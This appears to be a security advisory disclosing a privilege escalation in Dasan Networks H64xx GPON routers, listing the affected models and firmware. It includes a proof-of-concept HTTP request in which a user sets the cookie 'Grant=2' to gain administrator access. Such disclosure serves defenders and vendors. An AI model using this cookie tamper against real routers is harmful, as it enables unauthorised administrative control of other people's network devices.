### Vendor: Dasan Networks### Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu### Affected version: Model: * H640GR-02* H640GV-03* H640GW-02* H640RW-02* H645GFirmware: * 2.77-1115* 2.76-9999* 2.76-1101* 2.67-1070* 2.45-1045### Summary: H64xx is comprised of one G-PON uplink port and four portsof Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). Ithelps service providers to extend their core optical network all theway to their subscribers, eliminating bandwidth bottlenecks in thelast mile. H64xx is integrated device that provide the high qualityInternet, telephony service (VoIP) and IPTV or OTT content for homeor office. H64xx enable the subscribers to make a phone call whosequality is equal to PSTN at competitive price, and enjoy the highquality resolution live video and service such as VoD or High SpeedInternet.### Desc:The application suffers from a privilege escalation vulnerability.A normal user can elevate his/her privileges by changing the Cookie 'Grant'from 1 (user) to 2 (admin) gaining administrative privileges and revealingadditional functionalities or additional advanced menu settings.### Tested on: Server: lighttpd/1.4.31Server: DasanNetwork Solution### PoCChange cookie Grant=1 (user) to Grant=2 (admin):“`GET /cgi-bin/index.cgi HTTP/1.1Host: 192.168.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Bond-James-Bond/007Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.8,mk;q=0.6Cookie: Grant=2; Language=macedonian; silverheader=3cConnection: close“`